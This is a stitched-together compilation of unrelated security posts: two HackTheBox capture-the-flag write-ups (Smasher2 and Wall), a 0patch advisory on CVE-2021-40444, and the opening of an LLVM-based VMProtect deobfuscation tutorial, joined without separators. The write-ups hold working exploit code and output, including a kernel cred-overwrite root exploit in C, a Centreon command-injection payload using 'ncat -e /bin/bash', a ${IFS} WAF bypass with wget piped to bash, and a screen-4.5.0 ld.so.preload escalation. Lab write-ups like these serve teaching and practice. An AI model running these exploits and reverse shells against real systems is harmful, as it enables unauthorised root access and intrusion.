structcred{atomic_tusage;#ifdef CONFIG_DEBUG_CREDENTIALS
atomic_tsubscribers;/* number of processes subscribed */void*put_addr;unsignedmagic;#define CRED_MAGIC 0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
kuid_tuid;/* real UID of the task */kgid_tgid;/* real GID of the task */kuid_tsuid;/* saved UID of the task */kgid_tsgid;/* saved GID of the task */kuid_teuid;/* effective UID of the task */kgid_tegid;/* effective GID of the task */kuid_tfsuid;/* UID for VFS ops */kgid_tfsgid;/* GID for VFS ops */unsignedsecurebits;/* SUID-less security management */kernel_cap_tcap_inheritable;/* caps our children can inherit */kernel_cap_tcap_permitted;/* caps we're permitted */kernel_cap_tcap_effective;/* caps we can actually use */kernel_cap_tcap_bset;/* capability bounding set */kernel_cap_tcap_ambient;/* Ambient capability set */#ifdef CONFIG_KEYS
unsignedcharjit_keyring;/* default keyring to attach requested
* keys to */structkey*session_keyring;/* keyring inherited over fork */structkey*process_keyring;/* keyring private to this process */structkey*thread_keyring;/* keyring private to this thread */structkey*request_key_auth;/* assumed request_key authority */#endif
#ifdef CONFIG_SECURITY
void*security;/* subjective LSM security */#endif
structuser_struct*user;/* real user ID subscription */structuser_namespace*user_ns;/* user_ns the caps and keyrings are relative to. */structgroup_info*group_info;/* supplementary groups for euid/fsgid *//* RCU deletion */union{intnon_rcu;/* Can we skip RCU deletion? */structrcu_headrcu;/* RCU deletion hook */};}
We’ll notice that the first 8 integers (representing our uid, gid, saved uid, saved gid, effective uid, effective gid, uid and gid for the virtual file system) are known to us, which represents a reliable pattern to search for in the memory:
kuid_tuid;/* real UID of the task */kgid_tgid;/* real GID of the task */kuid_tsuid;/* saved UID of the task */kgid_tsgid;/* saved GID of the task */kuid_teuid;/* effective UID of the task */kgid_tegid;/* effective GID of the task */kuid_tfsuid;/* UID for VFS ops */kgid_tfsgid;/* GID for VFS ops */
These 8 integers are followed by a variable called securebits:
Then that variable is followed by our capabilities:
kernel_cap_tcap_inheritable;/* caps our children can inherit */kernel_cap_tcap_permitted;/* caps we're permitted */kernel_cap_tcap_effective;/* caps we can actually use */kernel_cap_tcap_bset;/* capability bounding set */kernel_cap_tcap_ambient;/* Ambient capability set */
Since we know the first 8 integers we can search through the memory for that pattern, when we find a valid cred structure pattern we’ll overwrite each integer of the 8 with a 0 and check if our uid changed to 0, we’ll keep doing it until we overwrite the one which belongs to our process, then we’ll overwrite the capabilities with 0xffffffffffffffff and execute /bin/sh. Let’s try to implement the search for cred structures first.
To do that we will get our uid with getuid():
unsignedintuid=getuid();
Then search for 8 consecutive integers that are equal to our uid, when we find a cred structure we’ll print its pointer and keep searching:
Now we need to overwrite the cred structure that belongs to our process, we’ll keep overwriting every cred structure we find and check our uid, when we overwrite the one that belongs to our process our uid should be 0:
credIt=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;if(getuid()==0){printf("[*] Process cred structure found ptr: %p, crednum: %d\n",addr,credNum);break;}
pwn.c:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
intmain(intargc,char*const*argv){printf("[+] PID: %d\n",getpid());intfd=open("/dev/dhid",O_RDWR);if(fd<0){printf("[!] Open failed!\n");return-1;}printf("[*] Open OK fd: %d\n",fd);unsignedlongsize=0xf0000000;unsignedlongmmapStart=0x42424000;unsignedint*addr=(unsignedint*)mmap((void*)mmapStart,size,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0x0);if(addr==MAP_FAILED){perror("Failed to mmap: ");close(fd);return-1;}printf("[*] mmap OK address: %lx\n",addr);unsignedintuid=getuid();printf("[*] Current UID: %d\n",uid);unsignedintcredIt=0;unsignedintcredNum=0;while(((unsignedlong)addr)<(mmapStart+size-0x40)){credIt=0;if(addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid){credNum++;printf("[*] Cred structure found! ptr: %p, crednum: %d\n",addr,credNum);credIt=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;if(getuid()==0){printf("[*] Process cred structure found ptr: %p, crednum: %d\n",addr,credNum);break;}else{credIt=0;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;}}addr++;}fflush(stdout);intstop=getchar();return0;}
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
intmain(intargc,char*const*argv){printf("\033[93m[+] PID: %d\n",getpid());intfd=open("/dev/dhid",O_RDWR);if(fd<0){printf("\033[93m[!] Open failed!\n");return-1;}printf("\033[32m[*] Open OK fd: %d\n",fd);unsignedlongsize=0xf0000000;unsignedlongmmapStart=0x42424000;unsignedint*addr=(unsignedint*)mmap((void*)mmapStart,size,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0x0);if(addr==MAP_FAILED){perror("\033[93m[!] Failed to mmap !");close(fd);return-1;}printf("\033[32m[*] mmap OK address: %lx\n",addr);unsignedintuid=getuid();puts("\033[93m[+] Searching for the process cred structure ...");unsignedintcredIt=0;unsignedintcredNum=0;while(((unsignedlong)addr)<(mmapStart+size-0x40)){credIt=0;if(addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid&&addr[credIt++]==uid){credNum++;credIt=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;addr[credIt++]=0;if(getuid()==0){printf("\033[32m[*] Cred structure found ! ptr: %p, crednum: %d\n",addr,credNum);puts("\033[32m[*] Got Root");puts("\033[32m[+] Spawning a shell");credIt+=1;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;addr[credIt++]=0xffffffff;execl("/bin/sh","-",(char*)NULL);puts("\033[93m[!] Execl failed...");break;}else{credIt=0;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;addr[credIt++]=uid;}}addr++;}return0;}
And finally:
dzonerzy@smasher2:/dev/shm$ ./pwn
[+] PID: 1153
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[+] Searching for the process cred structure ...
[*] Cred structure found ! ptr: 0xb60ad084, crednum: 20
[*] Got Root
[+] Spawning a shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(dzonerzy)
#
We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.
Hey guys, today Wall retired and here’s my write-up about it. It was an easy Linux machine with a web application vulnerable to RCE, WAF bypass to be able to exploit that vulnerability and a vulnerable suid binary. It’s a Linux machine and its ip is 10.10.10.157, I added it to /etc/hosts as wall.htb. Let’s jump right in !
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/wall# nmap -sV -sT -sC -o nmapinitial wall.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 13:59 EST
Nmap scan report for wall.htb (10.10.10.157)
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
| 256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_ 256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds
root@kali:~/Desktop/HTB/boxes/wall#
We got http on port 80 and ssh on port 22. Let’s check the web service.
The only interesting thing was /monitoring, however that path was protected by basic http authentication:
I didn’t have credentials, I tried bruteforcing them but it didn’t work so I spent sometime enumerating but I couldn’t find the credentials anywhere. Turns out that by changing the request method from GET to POST we can bypass the authentication:
root@kali:~/Desktop/HTB/boxes/wall# curl -X POST http://wall.htb/monitoring/
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>
<meta http-equiv="refresh" content="0; URL='/centreon'" />
root@kali:~/Desktop/HTB/boxes/wall#
The response was a redirection to /centreon:
Centreon is a network, system, applicative supervision and monitoring tool. -github
Bruteforcing the credentials through the login form will require writing a script because there’s a csrf token that changes every request, alternatively we can use the API.
According to the authentication part we can send a POST request to /api/index.php?action=authenticate with the credentials. In case of providing valid credentials it will respond with the authentication token, otherwise it will respond with a 403.
I used wfuzz with darkweb2017-top10000.txt from seclists:
root@kali:~/Desktop/HTB/boxes/wall# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://wall.htb/centreon/api/index.php?action=authenticate
Total requests: 10000
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000005: 403 0 L 2 W 17 Ch "qwerty"
000000006: 403 0 L 2 W 17 Ch "abc123"
000000008: 200 0 L 1 W 60 Ch "password1"
000000004: 403 0 L 2 W 17 Ch "password"
000000007: 403 0 L 2 W 17 Ch "12345678"
000000009: 403 0 L 2 W 17 Ch "1234567"
000000010: 403 0 L 2 W 17 Ch "123123"
000000001: 403 0 L 2 W 17 Ch "123456"
000000002: 403 0 L 2 W 17 Ch "123456789"
000000003: 403 0 L 2 W 17 Ch "111111"
000000011: 403 0 L 2 W 17 Ch "1234567890"
000000012: 403 0 L 2 W 17 Ch "000000"
000000013: 403 0 L 2 W 17 Ch "12345"
000000015: 403 0 L 2 W 17 Ch "1q2w3e4r5t"
^C
Finishing pending requests...
root@kali:~/Desktop/HTB/boxes/wall#
password1 resulted in a 200 response so its the right password:
RCE | WAF Bypass –> Shell as www-data
I checked the version of centreon and it was 19.04:
It was vulnerable to RCE (CVE-2019-13024, discovered by the author of the box) and there was an exploit for it:
The script attempts to configure a poller and this is the payload that’s sent in the POST request:
payload_info={"name":"Central","ns_ip_address":"127.0.0.1",# this value should be 1 always
"localhost[localhost]":"1","is_default[is_default]":"0","remote_id":"","ssh_port":"22","init_script":"centengine",# this value contains the payload , you can change it as you want
"nagios_bin":"ncat -e /bin/bash {0} {1} #".format(ip,port),"nagiostats_bin":"/usr/sbin/centenginestats","nagios_perfdata":"/var/log/centreon-engine/service-perfdata","centreonbroker_cfg_path":"/etc/centreon-broker","centreonbroker_module_path":"/usr/share/centreon/lib/centreon-broker","centreonbroker_logs_path":"","centreonconnector_path":"/usr/lib64/centreon-connector","init_script_centreontrapd":"centreontrapd","snmp_trapd_path_conf":"/etc/snmp/centreon_traps/","ns_activate[ns_activate]":"1","submitC":"Save","id":"1","o":"c","centreon_token":poller_token,}
nagios_bin is the vulnerable parameter:
# this value contains the payload , you can change it as you want
"nagios_bin":"ncat -e /bin/bash {0} {1} #".format(ip,port),
I checked the configuration page and looked at the HTML source, nagios_bin is the monitoring engine binary, I tried to inject a command there:
When I tried to save the configuration I got a 403:
That’s because there’s a WAF blocking these attempts, I could bypass the WAF by replacing the spaces in the commands with ${IFS}. I saved the reverse shell payload in a file then I used wget to get the file contents and I piped it to bash. a:
root@kali:~/Desktop/HTB/boxes/wall# python exploit.py http://wall.htb/centreon/ admin password1 10.10.xx.xx 1337
[+] Retrieving CSRF token to submit the login form
exploit.py:38: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.
The code that caused this warning is on line 38 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
soup = BeautifulSoup(html_content)
[+] Login token is : ba28f431a995b4461731fb394eb01d79
[+] Logged In Sucssfully
[+] Retrieving Poller token
exploit.py:56: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.
The code that caused this warning is on line 56 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.
poller_soup = BeautifulSoup(poller_html)
[+] Poller token is : d5702ae3de1264b0692afcef86074f07
[+] Injecting Done, triggering the payload
[+] Check your netcat listener !
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.157] 37862
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+ Stopped nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/wall# stty raw -echo
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
www-data@Wall:/usr/local/centreon/www$ export TERM=screen
www-data@Wall:/usr/local/centreon/www$
Screen 4.5.0 –> Root Shell –> User & Root Flags
There were two users on the box, shelby and sysmonitor. I couldn’t read the user flag as www-data:
I searched for suid binaries and saw screen-4.5.0, similar to the privesc in Flujab I used this exploit.
The exploit script didn’t work properly so I did it manually, I compiled the binaries on my box:
libhax.c:
Then I uploaded them to the box and did the rest of the exploit:
www-data@Wall:/home/shelby$ cd /tmp/
www-data@Wall:/tmp$ wget http://10.10.xx.xx/libhax.so
--2019-12-07 00:23:12-- http://10.10.xx.xx/libhax.so
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'
libhax.so 100%[===================>] 15.77K 11.7KB/s in 1.3s
2019-12-07 00:23:14 (11.7 KB/s) - 'libhax.so' saved [16144/16144]
www-data@Wall:/tmp$ wget http://10.10.xx.xx/rootshell
--2019-12-07 00:23:20-- http://10.10.xx.xx/rootshell
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'
rootshell 100%[===================>] 16.44K 16.3KB/s in 1.0s
2019-12-07 00:23:22 (16.3 KB/s) - 'rootshell' saved [16832/16832]
www-data@Wall:/tmp$
www-data@Wall:/tmp$ cd /etc
www-data@Wall:/etc$ umask 000
www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
www-data@Wall:/etc$ /bin/screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.
www-data@Wall:/etc$ /tmp/rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon)
#
And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.
September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally upon opening such document. This vulnerability was found under exploitation in the wild.
The Vulnerability
Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:
Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.
"File extension" URL scheme: For some reason, Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit was utilizing this "feature" to launch the previously downloaded executable file with the Control Panel application and have it executed via URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since .cpl extension is associated with control.exe, this app would get launched and given the provided path as an argument.
The second flaw is the more critical one, as there may exist various other ways to get a malicious file on user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such file.
Microsoft's Patch
What Microsoft's patch did was add a check before calling ShellExecute on the provided URL to block URL schemes beginning with a non-alphanumeric character - blocking schemes beginning with a dot such as ".cpl" -, and further limiting the allowed set of characters for the remaining string.
Note that ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across entire Windows, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully remotely delivered content can't find some other way towards ShellExecute that bypasses this new security check.
Our Micropatch
Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.
The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.
Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.
We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.
Our CVE-2021-40444 micropatches are therefore available for:
Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support)
Below is a video of our patch in action. Notice that with 0patch disabled, Calculator is launched both upon opening the Word document and upon previewing the RTF document in Windows Explorer Preview. In both cases, Process Monitor shows that control.exe gets launched, which loads the "malicious" executable, in our case spawning Calculator. With 0patch enabled, control.exe does not get launched, and therefore neither does Calculator.
In line with our guidelines, these patches require a PRO license. To obtain them and have them applied on your computer(s) along with other micropatches included with a PRO license, create an account in 0patch Central, install 0patch Agent and register it to your account, then purchase 0patch PRO. For a free trial, contact [email protected].
Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatches.
We'd like to thank Will Dormann for an in-depth public analysis of this vulnerability, which helped us create a micropatch and protect our users.
To learn more about 0patch, please visit our Help Center.
This series of posts delves into a collection of experiments I did in the past while playing around with LLVM and VMProtect. I recently decided to dust off the code, organize it a bit better and attempt to share some knowledge in such a way that could be helpful to others. The macro topics are divided as follows:
First, let me list some important events that led to my curiosity for reversing obfuscation solutions and attack them with LLVM.
In 2017, a group of friends (SmilingWolf, mrexodia and xSRTsect) and I, hacked up a Python-based devirtualizer and solved a couple of VMProtect challenges posted on the Tuts4You forum. That was my first experience reversing a known commercial protector, and taught me that writing compiler-like optimizations, especially built on top of a not so well-designed IR, can be an awful adventure.
In 2018, a person nicknamed RYDB3RG, posted on Tuts4You a first insight on how LLVM optimizations could be beneficial when optimising VMProtected code. Although the easy example that was provided left me with a lot of questions on whether that approach would have been hassle-free or not.
In 2019, at the SPRO conference in London, Peter and I presented a paper titled “SATURN - Software Deobfuscation Framework Based On LLVM”, proposing, you guessed it, a software deobfuscation framework based on LLVM and describing the related pros/cons.
The ideas documented in this post come from insights obtained during the aforementioned research efforts, fine-tuned specifically to get a good-enough output prior to the recompilation/decompilation phases, and should be considered as stable as a proof-of-concept can be.
Before anyone starts a war about which framework is better for the job, pause a few seconds and search the truth deep inside you: every framework has pros/cons and everything boils down to choosing which framework to get mad at when something doesn’t work. I personally decided to get mad at LLVM, which over time proved to be a good research playground, rich with useful analysis and optimizations, consistently maintained, sporting a nice community and deeply entangled with the academic and industry worlds.
With that said, it’s crystal clear that LLVM is not born as a software deobfuscation framework, so scratching your head for hours, diving into its internals and bending them to your needs is a minimum requirement to achieve your goals.
I apologize in advance for the ample presence of long-ish code snippets, but I wanted the reader to have the relevant C++ or LLVM-IR code under their nose while discussing it.
Lifting
The following diagram shows a high-level overview of all the actions and components described in the upcoming sections. The blue blocks represent the inputs, the yellow blocks the actions, the white blocks the intermediate information and the purple block the output.
Enough words or code have been spent by others (1, 2, 3, 4) describing the virtual machine architecture used by VMProtect, so the next paragraph will quickly sum up the involved data structures with an eye on some details that will be fundamental to make LLVM’s job easier. To further simplify the explanation, the following paragraphs will assume the handling of x64 code virtualized by VMProtect 3.x. Drawing a parallel with x86 is trivial.
Liveness and aliasing information
Let’s start by saying that many deobfuscation tools are completely disregarding, or at best unsoundly handling, any information related to the aliasing properties bound to the memory accesses present in the code under analysis. LLVM on the contrary is a framework that bases a lot of its optimization passes on precise aliasing information, in such a way that the semantic correctness of the code is preserved. Additionally LLVM also has strong optimization passes benefiting from precise liveness information, that we absolutely want to take advantage of to clean any unnecessary stores to memory that are irrelevant after the execution of the virtualized code.
This means that we need to pause for a moment to think about the properties of the data structures involved in the code that we are going to lift, keeping in mind how they may alias with each other, for how long we need them to hold their values and if there are safe assumptions that we can feed to LLVM to obtain the best possible result.
A suboptimal representation of the data structures is most likely going to lead to suboptimal lifted code because the LLVM’s optimizations are going to be hindered by the lack of information, erring on the safe side to keep the code semantically correct. Way worse though, is the case where an unsound assumption is going to lead to lifted code that is semantically incorrect.
At a high level we can summarize the data-related virtual machine components as follows:
30 virtual registers: used internally by the virtual machine. Their liveness scope starts after the VmEnter, when they are initialized with the incoming host execution context, and ends before the VmExit(s), when their values are copied to the outgoing host execution context. Therefore their state should not persist outside the virtualized code. They are allocated on the stack, in a memory chunk that can only be accessed by specific VmHandlers and is therefore guaranteed to be inaccessible by an arbitrary stack access executed by the virtualized code. They are independent from one another, so writing to one won’t affect the others. During the virtual execution they can be accessed as a whole or in subregisters. From now on referred to as VmRegisters.
19 passing slots: used by VMProtect to pass the execution state from one VmBlock to another. Their liveness starts at the epilogue of a VmBlock and ends at the prologue of the successor VmBlock(s). They are allocated on the stack and, while alive, they are only accessed by the push/pop instructions at the epilogue/prologue of each VmBlock. They are independent from one another and always accessed as a whole stack slot. From now on referred to as VmPassingSlots.
16 general purpose registers: pushed to the stack during the VmEnter, loaded and manipulated by means of the VmRegisters and popped from the stack during the VmExit(s), reflecting the changes made to them during the virtual execution. Their liveness scope starts before the VmEnter and ends after the VmExit(s), so their state must persist after the execution of the virtualized code. They are independent from one another, so writing to one won’t affect the others. Contrarily to the VmRegisters, the general purpose registers are always accessed as a whole. The flags register is also treated as the general purpose registers liveness-wise, but it can be directly accessed by some VmHandlers.
4 general purpose segments: the FS and GS general purpose segment registers have their liveness scope matching with the general purpose registers and the underlying segments are guaranteed not to overlap with other memory regions (e.g. SS, DS). On the contrary, accesses to the SS and DS segments are not always guaranteed to be distinct with each other. The liveness of the SS and DS segments also matches with the general purpose registers. A little digression: in the past I noticed that some projects were lifting the stack with an intra-virtual function scope which, in my experience, may cause a number of problems if the virtualized code is not a function with a well-formed stack frame, but rather a shellcode that pops some value pushed prior to entering the virtual machine or pushes some value that needs to live after exiting the virtual machine.
Helper functions
With the information gathered from the previous section, we can proceed with defining some basic LLVM-IR structures that will then be used to lift the individual VmHandlers, VmBlocks and VmFunctions.
When I first started with LLVM, my approach to generate the needed structures or instruction chains was through the IRBuilder class, but I quickly realized that I was spending more time looking at the documentation to generate the required types and instructions than actually focusing on designing them. Then, while working on SATURN, it became obvious that following Remill’s approach is a winning strategy, at least for the initial high level design phase. In fact their idea is to implement the structures and semantics in C++, compile them to LLVM-IR and dynamically load the generated bitcode file to be used by the lifter.
Without further ado, the following is a minimal implementation of a stub function that we can use as a template to lift a VmStub (virtualized code between a VmEnter and one or more VmExit(s)):
structVirtualRegisterfinal{union{alignas(1)struct{uint8_tb0;uint8_tb1;uint8_tb2;uint8_tb3;uint8_tb4;uint8_tb5;uint8_tb6;uint8_tb7;}byte;alignas(2)struct{uint16_tw0;uint16_tw1;uint16_tw2;uint16_tw3;}word;alignas(4)struct{uint32_td0;uint32_td1;}dword;alignas(8)uint64_tqword;}__attribute__((packed));}__attribute__((packed));usingrref=size_t&__restrict__;extern"C"uint8_tRAM[0];extern"C"uint8_tGS[0];extern"C"uint8_tFS[0];extern"C"size_tHelperStub(rrefrax,rrefrbx,rrefrcx,rrefrdx,rrefrsi,rrefrdi,rrefrbp,rrefrsp,rrefr8,rrefr9,rrefr10,rrefr11,rrefr12,rrefr13,rrefr14,rrefr15,rrefflags,size_tKEY_STUB,size_tRET_ADDR,size_tREL_ADDR,rrefvsp,rrefvip,VirtualRegister*__restrict__vmregs,size_t*__restrict__slots);extern"C"size_tHelperFunction(rrefrax,rrefrbx,rrefrcx,rrefrdx,rrefrsi,rrefrdi,rrefrbp,rrefrsp,rrefr8,rrefr9,rrefr10,rrefr11,rrefr12,rrefr13,rrefr14,rrefr15,rrefflags,size_tKEY_STUB,size_tRET_ADDR,size_tREL_ADDR){// Allocate the temporary virtual registersVirtualRegistervmregs[30]={0};// Allocate the temporary passing slotssize_tslots[19]={0};// Initialize the virtual registerssize_tvsp=rsp;size_tvip=0;// Force the relocation address to 0REL_ADDR=0;// Execute the virtualized codevip=HelperStub(rax,rbx,rcx,rdx,rsi,rdi,rbp,rsp,r8,r9,r10,r11,r12,r13,r14,r15,flags,KEY_STUB,RET_ADDR,REL_ADDR,vsp,vip,vmregs,slots);// Return the next address(es)returnvip;}
The VirtualRegister structure is meant to represent a VmRegister, divided in smaller sub-chunks that are going to be accessed by the VmHandlers in ways that don’t necessarily match the access to the subregisters on the x64 architecture. As an example, virtualizing the 64 bits bswap instruction will yield VmHandlers accessing all the word sub-chunks of a VmRegister. The __attribute__((packed)) is meant to generate a structure without padding bytes, matching the exact data layout used by a VmRegister.
The rref definition is a convenience type adopted in the definition of the arguments used by the helper functions, that, once compiled to LLVM-IR, will generate a pointer parameter with a noalias attribute. The noalias attribute is hinting to the compiler that any memory access happening inside the function that is not dereferencing a pointer derived from the pointer parameter, is guaranteed not to alias with a memory access dereferencing a pointer derived from the pointer parameter.
The RAM, GS and FS array definitions are convenience zero-length arrays that we can use to generate indexed memory accesses to a generic memory slot (stack segment, data segment), GS segment and FS segment. The accesses will be generated as getelementptr instructions and LLVM will automatically treat a pointer with base RAM as not aliasing with a pointer with base GS or FS, which is extremely convenient to us.
The HelperStub function prototype is a convenience declaration that we’ll be able to use in the lifter to represent a single VmBlock. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer, three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter, the virtual stack pointer, the virtual program counter, the VmRegisters pointer and the VmPassingSlots pointer.
The HelperFunction function definition is a convenience template that we’ll be able to use in the lifter to represent a single VmStub. It accepts as parameters the sequence of general purpose register pointers, the flags register pointer and the three key values (KEY_STUB, RET_ADDR, REL_ADDR) pushed by each VmEnter. The body is declaring an array of 30 VmRegisters, an array of 19 VmPassingSlots, the virtual stack pointer and the virtual program counter. Once compiled to LLVM-IR they’ll be turned into alloca declarations (stack frame allocations), guaranteed not to alias with other pointers used into the function and that will be automatically released at the end of the function scope. As a convenience we are setting the REL_ADDR to 0, but that can be dynamically set to the proper REL_ADDR provided by the user according to the needs of the binary under analysis. Last but not least, we are issuing the call to the HelperStub function, passing all the needed parameters and obtaining as output the updated instruction pointer, that, in turn, will be returned by the HelperFunction too.
The global variable and function declarations are marked as extern "C" to avoid any form of name mangling. In fact we want to be able to fetch them from the dynamically loaded LLVM-IR Module using functions like getGlobalVariable and getFunction.
The compiled and optimized LLVM-IR code for the described C++ definitions follows:
We can now move on to the implementation of the semantics of the handlers used by VMProtect. As mentioned before, implementing them directly at the LLVM-IR level can be a tedious task, so we’ll proceed with the same C++ to LLVM-IR logic adopted in the previous section.
The following selection of handlers should give an idea of the logic adopted to implement the handlers’ semantics.
STACK_PUSH
To access the stack using the push operation, we define a templated helper function that takes the virtual stack pointer and value to push as parameters.
template<typenameT>__attribute__((always_inline))voidSTACK_PUSH(size_t&vsp,Tvalue){// Update the stack pointervsp-=sizeof(T);// Store the valuestd::memcpy(&RAM[vsp],&value,sizeof(T));}
We can see that the virtual stack pointer is decremented using the byte size of the template parameter. Then we proceed to use the std::memcpy function to execute a safe type punning store operation accessing the RAM array with the virtual stack pointer as index. The C++ implementation is compiled with -O3 optimizations, so the function will be inlined (as expected from the always_inline attribute) and the std::memcpy call will be converted to the proper pointer type cast and store instructions.
STACK_POP
As expected, also the stack pop operation is defined as a templated helper function that takes the virtual stack pointer as parameter and returns the popped value as output.
template<typenameT>__attribute__((always_inline))TSTACK_POP(size_t&vsp){// Fetch the valueTvalue=0;std::memcpy(&value,&RAM[vsp],sizeof(T));// Undefine the stack slotTundef=UNDEF<T>();std::memcpy(&RAM[vsp],&undef,sizeof(T));// Update the stack pointervsp+=sizeof(T);// Return the valuereturnvalue;}
